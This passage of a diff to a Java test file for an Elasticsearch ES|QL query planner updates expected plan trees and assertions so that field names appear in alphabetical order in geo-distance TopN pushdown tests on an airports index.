"location", "country", "city", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -5801,20 +5850,19 @@ public void testPushTopNDistanceToSource() { } /** - * ProjectExec[[abbrev{f}#8, name{f}#9, location{f}#12, country{f}#13, city{f}#14]] - * \_TopNExec[[Order[$$order_by$0$0{r}#16,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#8, name{f}#9, location{f}#12, country{f}#13, city{f}#14, $$order_by$0$0{r}#16],false] - * \_ProjectExec[[abbrev{f}#8, name{f}#9, location{f}#12, country{f}#13, city{f}#14, $$order_by$0$0{r}#16]] - * \_FieldExtractExec[abbrev{f}#8, name{f}#9, country{f}#13, city{f}#14][] - * \_EvalExec[[ - * STDISTANCE(location{f}#12,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS $$order_by$0$0 - * ]] - * \_FieldExtractExec[location{f}#12][] + *ProjectExec[[abbrev{f}#5258, name{f}#5259, location{f}#5262, country{f}#5263, city{f}#5264]] + * \_TopNExec[[Order[$$order_by$0$0{r}#5266,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#5258, city{f}#5264, country{f}#5263, location{f}#5262, name{f}#5259, $$order_by$0$0{r}#5266],false] + * \_ProjectExec[[abbrev{f}#5258, city{f}#5264, country{f}#5263, location{f}#5262, name{f}#5259, $$order_by$0$0{r}#5266]] + * \_FieldExtractExec[abbrev{f}#5258, city{f}#5264, country{f}#5263, name..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#5262,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS $$orde + * r_by$0$0#5266]] + * \_FieldExtractExec[location{f}#5262]<[],[]> * \_EsQueryExec[airports], - * indexMode[standard], - * query[][_doc{f}#26], - * limit[5], - * sort[[GeoDistanceSort[field=location{f}#12, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] + * indexMode[standard], + * query[][_doc{f}#5276], + * limit[5], + * sort[[GeoDistanceSort[field=location{f}#5262, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] */ public void testPushTopNInlineDistanceToSource() { var optimized 
= optimizedPlan(physicalPlan(""" @@ -5834,15 +5882,15 @@ public void testPushTopNInlineDistanceToSource() { names(project.projections()), contains( equalTo("abbrev"), - equalTo("name"), - equalTo("location"), - equalTo("country"), equalTo("city"), + equalTo("country"), + equalTo("location"), + equalTo("name"), startsWith("$$order_by$0$") ) ); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), startsWith("$$order_by$0$")); @@ -5871,14 +5919,14 @@ public void testPushTopNInlineDistanceToSource() { /** * - * ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18]] - * \_TopNExec[[Order[distance{r}#4,ASC,LAST]],5[INTEGER],0] - * \_ExchangeExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18, distance{r}#4],false] - * \_ProjectExec[[abbrev{f}#12, name{f}#13, location{f}#16, country{f}#17, city{f}#18, distance{r}#4]] - * \_FieldExtractExec[abbrev{f}#12, name{f}#13, country{f}#17, city{f}#18][] - * \_EvalExec[[STDISTANCE(location{f}#16,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance - * ]] - * \_FieldExtractExec[location{f}#16][] + * ProjectExec[[abbrev{f}#361, name{f}#362, location{f}#365, country{f}#366, city{f}#367]] + * \_TopNExec[[Order[distance{r}#353,ASC,LAST]],5[INTEGER],229] + * \_ExchangeExec[[abbrev{f}#361, city{f}#367, country{f}#366, location{f}#365, name{f}#362, distance{r}#353],false] + * \_ProjectExec[[abbrev{f}#361, city{f}#367, country{f}#366, location{f}#365, name{f}#362, distance{r}#353]] + * \_FieldExtractExec[abbrev{f}#361, city{f}#367, country{f}#366, name{f}..]<[],[]> + * \_EvalExec[[STDISTANCE(location{f}#365,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distanc + * e#353]] + * \_FieldExtractExec[location{f}#365]<[],[]> * \_EsQueryExec[airports], indexMode[standard], query[ * { * "geo_shape":{ @@ -5891,7 +5939,7 @@ public void testPushTopNInlineDistanceToSource() { * } * } * } - * }][_doc{f}#29], limit[5], sort[[GeoDistanceSort[field=location{f}#16, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] + * ][_doc{f}#378], limit[5], sort[[GeoDistanceSort[field=location{f}#365, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245] * */ public void testPushTopNDistanceWithFilterToSource() { @@ -5909,9 +5957,9 @@ public void testPushTopNDistanceWithFilterToSource() { var exchange = asRemoteExchange(topN.child()); project = as(exchange.child(), ProjectExec.class); - assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "distance")); + assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance")); var extract = as(project.child(), FieldExtractExec.class); - assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city")); + assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name")); var evalExec = as(extract.child(), EvalExec.class); var alias = as(evalExec.fields().get(0), Alias.class); assertThat(alias.name(), is("distance")); @@ -5947,48 +5995,25 @@ public void testPushTopNDistanceWithFilterToSource() { /** * - * ProjectExec[[abbrev{f}#14, name{f}#15, 
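Every TopN-pushdown test above and below re-asserts the same contract; a condensed sketch built only from helper calls already visible in this file (variable names as in the tests):

    // After optimization, the TopN's limit and sort must live on the Lucene source node.
    var source = source(extract.child());
    assertThat(source.limit(), is(topN.limit()));
    assertThat(source.sorts(), is(fieldSorts(topN.order())));
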
@@ -5947,48 +5995,25 @@ public void testPushTopNDistanceWithFilterToSource() {

     /**
      *
-     * ProjectExec[[abbrev{f}#14, name{f}#15, location{f}#18, country{f}#19, city{f}#20]]
-     * \_TopNExec[[Order[distance{r}#4,ASC,LAST]],5[INTEGER],0]
-     *   \_ExchangeExec[[abbrev{f}#14, name{f}#15, location{f}#18, country{f}#19, city{f}#20, distance{r}#4],false]
-     *     \_ProjectExec[[abbrev{f}#14, name{f}#15, location{f}#18, country{f}#19, city{f}#20, distance{r}#4]]
-     *       \_FieldExtractExec[abbrev{f}#14, name{f}#15, country{f}#19, city{f}#20][]
-     *         \_EvalExec[[STDISTANCE(location{f}#18,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT])
-     *           AS distance]]
-     *           \_FieldExtractExec[location{f}#18][]
-     *             \_EsQueryExec[airports], indexMode[standard], query[{
-     *               "bool":{
-     *                 "filter":[
-     *                   {
-     *                     "esql_single_value":{
-     *                       "field":"scalerank",
-     *                       "next":{"range":{"scalerank":{"lt":6,"boost":1.0}}},
-     *                       "source":"scalerank lt 6@3:31"
-     *                     }
-     *                   },
-     *                   {
-     *                     "bool":{
-     *                       "must":[
-     *                         {"geo_shape":{
-     *                           "location":{
-     *                             "relation":"INTERSECTS",
-     *                             "shape":{"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}
-     *                           }
-     *                         }},
-     *                         {"geo_shape":{
-     *                           "location":{
-     *                             "relation":"DISJOINT",
-     *                             "shape":{"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}
-     *                           }
-     *                         }}
-     *                       ],
-     *                       "boost":1.0
-     *                     }
-     *                   }
-     *                 ],
-     *                 "boost":1.0
-     *               }}][_doc{f}#31], limit[5], sort[[
-     *               GeoDistanceSort[field=location{f}#18, direction=ASC, lat=55.673, lon=12.565]
-     *             ]] estimatedRowSize[245]
+     * ProjectExec[[abbrev{f}#6367, name{f}#6368, location{f}#6371, country{f}#6372, city{f}#6373]]
+     * \_TopNExec[[Order[distance{r}#6357,ASC,LAST]],5[INTEGER],229]
+     *   \_ExchangeExec[[abbrev{f}#6367, city{f}#6373, country{f}#6372, location{f}#6371, name{f}#6368, distance{r}#6357],false]
+     *     \_ProjectExec[[abbrev{f}#6367, city{f}#6373, country{f}#6372, location{f}#6371, name{f}#6368, distance{r}#6357]]
+     *       \_FieldExtractExec[abbrev{f}#6367, city{f}#6373, country{f}#6372, name..]<[],[]>
+     *         \_EvalExec[[STDISTANCE(location{f}#6371,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan
+     * ce#6357]]
+     *           \_FieldExtractExec[location{f}#6371]<[],[]>
+     *             \_EsQueryExec[airports], indexMode[standard], query[
+     *               {"bool":{"filter":[{"esql_single_value":{"field":"scalerank","next":{"range":
+     *               {"scalerank":{"lt":6,"boost":0.0}}},"source":"scalerank < 6@3:31"}},
+     *               {"bool":{"must":[{"geo_shape":
+     *               {"location":{"relation":"INTERSECTS","shape":
+     *               {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}},
+     *               {"geo_shape":{"location":{"relation":"DISJOINT","shape":
+     *               {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}]
+     *               ,"boost":1.0}}],"boost":1.0}}
+     *               ][_doc{f}#6384], limit[5], sort[
+     *               [GeoDistanceSort[field=location{f}#6371, direction=ASC, lat=55.673, lon=12.565]]] estimatedRowSize[245]
      *
      */
     public void testPushTopNDistanceWithCompoundFilterToSource() {
@@ -6006,9 +6031,9 @@ public void testPushTopNDistanceWithCompoundFilterToSource() {

         var exchange = asRemoteExchange(topN.child());
         project = as(exchange.child(), ProjectExec.class);
-        assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "distance"));
+        assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance"));
         var extract = as(project.child(), FieldExtractExec.class);
-        assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city"));
+        assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name"));
         var evalExec = as(extract.child(), EvalExec.class);
         var alias = as(evalExec.fields().get(0), Alias.class);
         assertThat(alias.name(), is("distance"));
@@ -6046,35 +6071,28 @@ public void testPushTopNDistanceWithCompoundFilterToSource() {

     /**
      * Tests that multiple sorts, including distance and a field, are pushed down to the source.
      *
-     * ProjectExec[[abbrev{f}#25, name{f}#26, location{f}#29, country{f}#30, city{f}#31, scalerank{f}#27, scale{r}#7]]
-     * \_TopNExec[[
-     *     Order[distance{r}#4,ASC,LAST],
-     *     Order[scalerank{f}#27,ASC,LAST],
-     *     Order[scale{r}#7,DESC,FIRST],
-     *     Order[loc{r}#10,DESC,FIRST]
-     *   ],5[INTEGER],0]
-     *   \_ExchangeExec[[abbrev{f}#25, name{f}#26, location{f}#29, country{f}#30, city{f}#31, scalerank{f}#27, scale{r}#7,
-     *     distance{r}#4, loc{r}#10],false]
-     *     \_ProjectExec[[abbrev{f}#25, name{f}#26, location{f}#29, country{f}#30, city{f}#31, scalerank{f}#27, scale{r}#7,
-     *       distance{r}#4, loc{r}#10]]
-     *       \_FieldExtractExec[abbrev{f}#25, name{f}#26, country{f}#30, city{f}#31][]
-     *         \_EvalExec[[
-     *           STDISTANCE(location{f}#29,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance,
-     *           10[INTEGER] - scalerank{f}#27 AS scale, TOSTRING(location{f}#29) AS loc
-     *         ]]
-     *           \_FieldExtractExec[location{f}#29, scalerank{f}#27][]
-     *             \_EsQueryExec[airports], indexMode[standard], query[{
-     *               "bool":{
-     *                 "filter":[
-     *                   {"esql_single_value":{"field":"scalerank","next":{...},"source":"scalerank < 6@3:31"}},
-     *                   {"bool":{
-     *                     "must":[
-     *                       {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}},
-     *                       {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}}
-     *                     ],"boost":1.0}}],"boost":1.0}}][_doc{f}#44], limit[5], sort[[
-     *               GeoDistanceSort[field=location{f}#29, direction=ASC, lat=55.673, lon=12.565],
-     *               FieldSort[field=scalerank{f}#27, direction=ASC, nulls=LAST]
-     *             ]] estimatedRowSize[303]
+     * ProjectExec[[abbrev{f}#7429, name{f}#7430, location{f}#7433, country{f}#7434, city{f}#7435, scalerank{f}#7431, scale{r}#74
+     * 11]]
+     * \_TopNExec[[Order[distance{r}#7408,ASC,LAST], Order[scalerank{f}#7431,ASC,LAST], Order[scale{r}#7411,DESC,FIRST], Order[l
+     * oc{r}#7414,DESC,FIRST]],5[INTEGER],287]
+     *   \_ExchangeExec[[abbrev{f}#7429, city{f}#7435, country{f}#7434, location{f}#7433, name{f}#7430, scalerank{f}#7431, distance{r}
+     * #7408, scale{r}#7411, loc{r}#7414],false]
+     *     \_ProjectExec[[abbrev{f}#7429, city{f}#7435, country{f}#7434, location{f}#7433, name{f}#7430, scalerank{f}#7431, distance{r}
+     * #7408, scale{r}#7411, loc{r}#7414]]
+     *       \_FieldExtractExec[abbrev{f}#7429, city{f}#7435, country{f}#7434, name..]<[],[]>
+     *         \_EvalExec[[STDISTANCE(location{f}#7433,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan
+     * ce#7408, 10[INTEGER] - scalerank{f}#7431 AS scale#7411, TOSTRING(location{f}#7433) AS loc#7414]]
+     *           \_FieldExtractExec[location{f}#7433, scalerank{f}#7431]<[],[]>
+     *             \_EsQueryExec[airports], indexMode[standard], query[
+     *               {"bool":{"filter":[{"esql_single_value":{"field":"scalerank","next":
+     *               {"range":{"scalerank":{"lt":6,"boost":0.0}}},"source":"scalerank < 6@3:31"}},
+     *               {"bool":{"must":[{"geo_shape":{"location":{"relation":"INTERSECTS","shape":
+     *               {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}},
+     *               {"geo_shape":{"location":{"relation":"DISJOINT","shape":
+     *               {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}],
+     *               "boost":1.0}}],"boost":1.0}}][_doc{f}#7448], limit[5], sort[
+     *               [GeoDistanceSort[field=location{f}#7433, direction=ASC, lat=55.673, lon=12.565],
+     *               FieldSort[field=scalerank{f}#7431, direction=ASC, nulls=LAST]]] estimatedRowSize[303]
      *
      */
     public void testPushTopNDistanceAndPushableFieldWithCompoundFilterToSource() {
@@ -6095,10 +6113,10 @@ public void testPushTopNDistanceAndPushableFieldWithCompoundFilterToSource() {
         project = as(exchange.child(), ProjectExec.class);
         assertThat(
             names(project.projections()),
-            contains("abbrev", "name", "location", "country", "city", "scalerank", "scale", "distance", "loc")
+            contains("abbrev", "city", "country", "location", "name", "scalerank", "distance", "scale", "loc")
         );
         var extract = as(project.child(), FieldExtractExec.class);
-        assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city"));
+        assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name"));
         var evalExec = as(extract.child(), EvalExec.class);
         var alias = as(evalExec.fields().get(0), Alias.class);
         assertThat(alias.name(), is("distance"));
@@ -6140,26 +6158,30 @@ public void testPushTopNDistanceAndPushableFieldWithCompoundFilterToSource() {

     /**
      * This test shows that if the filter contains a predicate on the same field that is sorted, we cannot push down the sort.
      *
-     * ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scalerank{f}#25 AS scale]]
-     * \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scalerank{f}#25,ASC,LAST]],5[INTEGER],0]
-     *   \_ExchangeExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scalerank{f}#25, distance{r}#4],false]
-     *     \_ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scalerank{f}#25, distance{r}#4]]
-     *       \_FieldExtractExec[abbrev{f}#23, name{f}#24, country{f}#28, city{f}#29][]
-     *         \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scalerank{f}#25,ASC,LAST]],5[INTEGER],208]
-     *           \_FieldExtractExec[scalerank{f}#25][]
-     *             \_FilterExec[SUBSTRING(position{r}#7,1[INTEGER],5[INTEGER]) == [50 4f 49 4e 54][KEYWORD]]
-     *               \_EvalExec[[
-     *                 STDISTANCE(location{f}#27,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance,
-     *                 TOSTRING(location{f}#27) AS position
-     *               ]]
-     *                 \_FieldExtractExec[location{f}#27][]
-     *                   \_EsQueryExec[airports], indexMode[standard], query[{
-     *                     "bool":{"filter":[
-     *                       {"esql_single_value":{"field":"scalerank","next":{"range":{"scalerank":{"lt":6,"boost":1.0}}},"source":...}},
-     *                       {"bool":{"must":[
-     *                         {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}},
-     *                         {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}}
-     *                       ],"boost":1.0}}],"boost":1.0}}][_doc{f}#42], limit[], sort[] estimatedRowSize[87]
+     * ProjectExec[[abbrev{f}#4856, name{f}#4857, location{f}#4860, country{f}#4861, city{f}#4862, scalerank{f}#4858 AS scale#484
+     * 3]]
+     * \_TopNExec[[Order[distance{r}#4837,ASC,LAST], Order[scalerank{f}#4858,ASC,LAST]],5[INTEGER],233]
+     *   \_ExchangeExec[[abbrev{f}#4856, city{f}#4862, country{f}#4861, location{f}#4860, name{f}#4857, scalerank{f}#4858, distance{r}
+     * #4837],false]
+     *     \_ProjectExec[[abbrev{f}#4856, city{f}#4862, country{f}#4861, location{f}#4860, name{f}#4857, scalerank{f}#4858, distance{r}
+     * #4837]]
+     *       \_FieldExtractExec[abbrev{f}#4856, city{f}#4862, country{f}#4861, name..]<[],[]>
+     *         \_TopNExec[[Order[distance{r}#4837,ASC,LAST], Order[scalerank{f}#4858,ASC,LAST]],5[INTEGER],303]
+     *           \_FieldExtractExec[scalerank{f}#4858]<[],[]>
+     *             \_FilterExec[SUBSTRING(position{r}#4840,1[INTEGER],5[INTEGER]) == POINT[KEYWORD]]
+     *               \_EvalExec[[STDISTANCE(location{f}#4860,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS
+     *               distance#4837, TOSTRING(location{f}#4860) AS position#4840]]
+     *                 \_FieldExtractExec[location{f}#4860]<[],[]>
+     *                   \_EsQueryExec[airports], indexMode[standard], query[
+     *                     {"bool":{"filter":[
+     *                     {"esql_single_value":
+     *                     {"field":"scalerank","next":{"range":{"scalerank":{"lt":6,"boost":0.0}}},"source":"scale < 6@3:93"}},
+     *                     {"bool":{"must":[
+     *                     {"geo_shape":{"location":{"relation":"INTERSECTS","shape":
+     *                     {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}},
+     *                     {"geo_shape":{"location":{"relation":"DISJOINT","shape":
+     *                     {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}
+     *                     ],"boost":1.0}}],"boost":1.0}}][_doc{f}#4875], limit[], sort[] estimatedRowSize[87]
      *
      */
     public void testPushTopNDistanceAndNonPushableEvalWithCompoundFilterToSource() {
@@ -6178,9 +6200,9 @@ public void testPushTopNDistanceAndNonPushableEvalWithCompoundFilterToSource() {

         var exchange = asRemoteExchange(topN.child());
         project = as(exchange.child(), ProjectExec.class);
-        assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance"));
+        assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "scalerank", "distance"));
         var extract = as(project.child(), FieldExtractExec.class);
-        assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city"));
+        assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name"));
         var topNChild = as(extract.child(), TopNExec.class);
         extract = as(topNChild.child(), FieldExtractExec.class);
         assertThat(names(extract.attributesToExtract()), contains("scalerank"));
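The next hunks cover the negative case. A sketch of the shape they assert, built from lines that appear verbatim in these tests:

    // When the filter predicates on the sort key through a non-pushable expression,
    // the TopN stays in the compute engine (a TopNExec above a FilterExec) and the
    // javadoc trees show an EsQueryExec with empty limit[] and sort[].
    var topNChild = as(extract.child(), TopNExec.class);
    var filter = as(topNChild.child(), FilterExec.class);
    assertThat(filter.condition(), isA(And.class));
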
@@ -6215,27 +6237,25 @@ public void testPushTopNDistanceAndNonPushableEvalWithCompoundFilterToSource() {

     /**
      * This test shows that if the filter contains a predicate on the same field that is sorted, we cannot push down the sort.
      *
-     * ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scale{r}#10]]
-     * \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scale{r}#10,ASC,LAST]],5[INTEGER],0]
-     *   \_ExchangeExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scale{r}#10, distance{r}#4],false]
-     *     \_ProjectExec[[abbrev{f}#23, name{f}#24, location{f}#27, country{f}#28, city{f}#29, scale{r}#10, distance{r}#4]]
-     *       \_FieldExtractExec[abbrev{f}#23, name{f}#24, country{f}#28, city{f}#29][]
-     *         \_TopNExec[[Order[distance{r}#4,ASC,LAST], Order[scale{r}#10,ASC,LAST]],5[INTEGER],208]
-     *           \_FilterExec[
-     *             SUBSTRING(position{r}#7,1[INTEGER],5[INTEGER]) == [50 4f 49 4e 54][KEYWORD]
-     *             AND scale{r}#10 > 3[INTEGER]
-     *           ]
-     *             \_EvalExec[[
-     *               STDISTANCE(location{f}#27,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distance,
-     *               TOSTRING(location{f}#27) AS position,
-     *               10[INTEGER] - scalerank{f}#25 AS scale
-     *             ]]
-     *               \_FieldExtractExec[location{f}#27, scalerank{f}#25][]
-     *                 \_EsQueryExec[airports], indexMode[standard], query[{
-     *                   "bool":{"must":[
-     *                     {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}},
-     *                     {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}}
-     *                   ],"boost":1.0}}][_doc{f}#42], limit[], sort[] estimatedRowSize[91]
+     * ProjectExec[[abbrev{f}#1447, name{f}#1448, location{f}#1451, country{f}#1452, city{f}#1453, scalerank{r}#1434]]
+     * \_TopNExec[[Order[distance{r}#1428,ASC,LAST], Order[scalerank{r}#1434,ASC,LAST]],5[INTEGER],233]
+     *   \_ExchangeExec[[abbrev{f}#1447, city{f}#1453, country{f}#1452, location{f}#1451, name{f}#1448, distance{r}#1428, scalerank{r}
+     * #1434],false]
+     *     \_ProjectExec[[abbrev{f}#1447, city{f}#1453, country{f}#1452, location{f}#1451, name{f}#1448, distance{r}#1428, scalerank{r}
+     * #1434]]
+     *       \_FieldExtractExec[abbrev{f}#1447, city{f}#1453, country{f}#1452, name..]<[],[]>
+     *         \_TopNExec[[Order[distance{r}#1428,ASC,LAST], Order[scalerank{r}#1434,ASC,LAST]],5[INTEGER],303]
+     *           \_FilterExec[SUBSTRING(position{r}#1431,1[INTEGER],5[INTEGER]) == POINT[KEYWORD] AND scalerank{r}#1434 > 3[INTEGER]]
+     *             \_EvalExec[[STDISTANCE(location{f}#1451,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan
+     * ce#1428, TOSTRING(location{f}#1451) AS position#1431, 10[INTEGER] - scalerank{f}#1449 AS scalerank#1434]]
+     *               \_FieldExtractExec[location{f}#1451, scalerank{f}#1449]<[],[]>
+     *                 \_EsQueryExec[airports], indexMode[standard], query[
+     *                   {"bool":{"must":[
+     *                   {"geo_shape":{"location":{"relation":"INTERSECTS","shape":
+     *                   {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}},
+     *                   {"geo_shape":{"location":{"relation":"DISJOINT","shape":
+     *                   {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}
+     *                   ],"boost":1.0}}][_doc{f}#1466], limit[], sort[] estimatedRowSize[91]
      *
      */
     public void testPushTopNDistanceAndNonPushableEvalsWithCompoundFilterToSource() {
@@ -6254,9 +6274,9 @@ public void testPushTopNDistanceAndNonPushableEvalsWithCompoundFilterToSource()

         var exchange = asRemoteExchange(topN.child());
         project = as(exchange.child(), ProjectExec.class);
-        assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance"));
+        assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "distance", "scalerank"));
         var extract = as(project.child(), FieldExtractExec.class);
-        assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city"));
+        assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name"));
         var topNChild = as(extract.child(), TopNExec.class);
         var filter = as(topNChild.child(), FilterExec.class);
         assertThat(filter.condition(), isA(And.class));
@@ -6331,9 +6351,9 @@ public void testPushTopNDistanceWithCompoundFilterToSourceAndDisjunctiveNonPusha

         var exchange = asRemoteExchange(topN.child());
         project = as(exchange.child(), ProjectExec.class);
-        assertThat(names(project.projections()), contains("abbrev", "name", "location", "country", "city", "scalerank", "distance"));
+        assertThat(names(project.projections()), contains("abbrev", "city", "country", "location", "name", "scalerank", "distance"));
         var extract = as(project.child(), FieldExtractExec.class);
-        assertThat(names(extract.attributesToExtract()), contains("abbrev", "name", "country", "city"));
+        assertThat(names(extract.attributesToExtract()), contains("abbrev", "city", "country", "name"));
         var topNChild = as(extract.child(), TopNExec.class);
         var filter = as(topNChild.child(), FilterExec.class);
         assertThat(filter.condition(), isA(Or.class));
@@ -6360,28 +6380,29 @@ public void testPushTopNDistanceWithCompoundFilterToSourceAndDisjunctiveNonPusha

     /**
      *
-     * ProjectExec[[abbrev{f}#15, name{f}#16, location{f}#19, country{f}#20, city{f}#21]]
-     * \_TopNExec[[Order[scalerank{f}#17,ASC,LAST], Order[distance{r}#4,ASC,LAST]],15[INTEGER],0]
-     *   \_ExchangeExec[[abbrev{f}#15, name{f}#16, location{f}#19, country{f}#20, city{f}#21, scalerank{f}#17, distance{r}#4],false]
-     *     \_ProjectExec[[abbrev{f}#15, name{f}#16, location{f}#19, country{f}#20, city{f}#21, scalerank{f}#17, distance{r}#4]]
-     *       \_FieldExtractExec[abbrev{f}#15, name{f}#16, country{f}#20, city{f}#21, ..][]
-     *         \_EvalExec[[STDISTANCE(location{f}#19,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT])
-     *           AS distance]]
-     *           \_FieldExtractExec[location{f}#19][]
-     *             \_EsQueryExec[airports], indexMode[standard], query[{
-     *               "bool":{
-     *                 "filter":[
-     *                   {"esql_single_value":{"field":"scalerank",...,"source":"scalerank lt 6@3:31"}},
-     *                   {"bool":{"must":[
-     *                     {"geo_shape":{"location":{"relation":"INTERSECTS","shape":{...}}}},
-     *                     {"geo_shape":{"location":{"relation":"DISJOINT","shape":{...}}}}
-     *                   ],"boost":1.0}}
-     *                 ],"boost":1.0
-     *               }
-     *             }][_doc{f}#32], limit[], sort[[
-     *               FieldSort[field=scalerank{f}#17, direction=ASC, nulls=LAST],
-     *               GeoDistanceSort[field=location{f}#19, direction=ASC, lat=55.673, lon=12.565]
-     *             ]] estimatedRowSize[37]
+     * ProjectExec[[abbrev{f}#6090, name{f}#6091, location{f}#6094, country{f}#6095, city{f}#6096]]
+     * \_TopNExec[[Order[scalerank{f}#6092,ASC,LAST], Order[distance{r}#6079,ASC,LAST]],15[INTEGER],233]
+     *   \_ExchangeExec[[abbrev{f}#6090, city{f}#6096, country{f}#6095, location{f}#6094, name{f}#6091, scalerank{f}#6092, distance{r}
+     * #6079],false]
+     *     \_ProjectExec[[abbrev{f}#6090, city{f}#6096, country{f}#6095, location{f}#6094, name{f}#6091, scalerank{f}#6092, distance{r}
+     * #6079]]
+     *       \_FieldExtractExec[abbrev{f}#6090, city{f}#6096, country{f}#6095, name..]<[],[]>
+     *         \_EvalExec[[STDISTANCE(location{f}#6094,[1 1 0 0 0 e1 7a 14 ae 47 21 29 40 a0 1a 2f dd 24 d6 4b 40][GEO_POINT]) AS distan
+     * ce#6079]]
+     *           \_FieldExtractExec[location{f}#6094]<[],[]>
+     *             \_EsQueryExec[airports], indexMode[standard], query[
+     *               {"bool":{"filter":[
+     *               {"esql_single_value":{"field":"scalerank","next":{"range":
+     *               {"scalerank":{"lt":6,"boost":0.0}}},"source":"scalerank < 6@3:31"}},
+     *               {"bool":{"must":[
+     *               {"geo_shape":{"location":{"relation":"INTERSECTS","shape":
+     *               {"type":"Circle","radius":"499999.99999999994m","coordinates":[12.565,55.673]}}}},
+     *               {"geo_shape":{"location":{"relation":"DISJOINT","shape":
+     *               {"type":"Circle","radius":"10000.000000000002m","coordinates":[12.565,55.673]}}}}
+     *               ],"boost":1.0}}],"boost":1.0}}
+     *               ][_doc{f}#6107], limit[15], sort[
+     *               [FieldSort[field=scalerank{f}#6092, direction=ASC, nulls=LAST],
